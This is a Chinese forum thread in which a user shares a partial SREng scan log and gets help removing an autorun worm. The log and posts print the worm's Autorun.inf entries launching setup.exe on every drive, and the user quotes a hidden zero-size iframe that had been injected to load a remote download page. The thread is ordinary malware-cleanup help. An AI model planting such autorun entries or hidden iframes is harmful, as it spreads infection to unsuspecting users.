????
.TXT  OK. [%SystemRoot%\system32\NOTEPAD.EXE %1]
.EXE  OK. ["%1" %*]
.COM  OK. ["%1" %*]
.PIF  OK. ["%1" %*]
.REG  OK. [regedit.exe "%1"]
.BAT  OK. ["%1" %*]
.SCR  OK. ["%1" /S]
.CHM  OK. ["D:\WINNT\hh.exe" %1]
.HLP  OK. [%SystemRoot%\System32\winhlp32.exe %1]
.INI  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.INF  OK. [%SystemRoot%\System32\NOTEPAD.EXE %1]
.VBS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.JS  OK. [%SystemRoot%\System32\WScript.exe "%1" %*]
.LNK  OK. [{00021401-0000-0000-C000-000000000046}]

==================================
Winsock ???
N/A

==================================
Autorun.inf
[C:\]
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
[D:\]
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
[E:\]
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe
[F:\]
[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

==================================
HOSTS ??
127.0.0.1      localhost

==================================
API HOOK
N/A

==================================


[/CODE]

以上是 SREngLOG 的原文。

因为周末的原因，迟上了，歉意！

谢谢 红夜鬼1 大侠！

奇怪
你的日志里怎么那么多问号
看一下这个东东D:\WINNT\system32\mspmsnsv.dll

浏览器加载项里修复这个
[]
{8FFBE65D-2C9C-4669-84BD-5829DC0B603C} <D:\WINNT\system32\macromed\download\Download.dll, Macromedia, Inc.>

修复Winsock文件
启动到安全模式下删除各个盘的Autorun.inf和setup.exe
不要双击哦,要右键选打开,要不病毒又回来了的

好的，先谢谢。

我马上就试，

到win2k 安全模式dos命令行下，attrib解除h s a后，但还是不能够删除。
还没有处理Autorun.inf完时，setup.exe又不见了，似乎看到过的。

Autorun.inf文件内容如下：

[AutoRun]
OPEN=setup.exe
shellexecute=setup.exe
shell\Auto\command=setup.exe

但到现在，没有再次见到添加
<iframe src=http://www.ctv163.com/wuhan/down.htm width=0 height=0></iframe>
了。

但还是心里不甘的。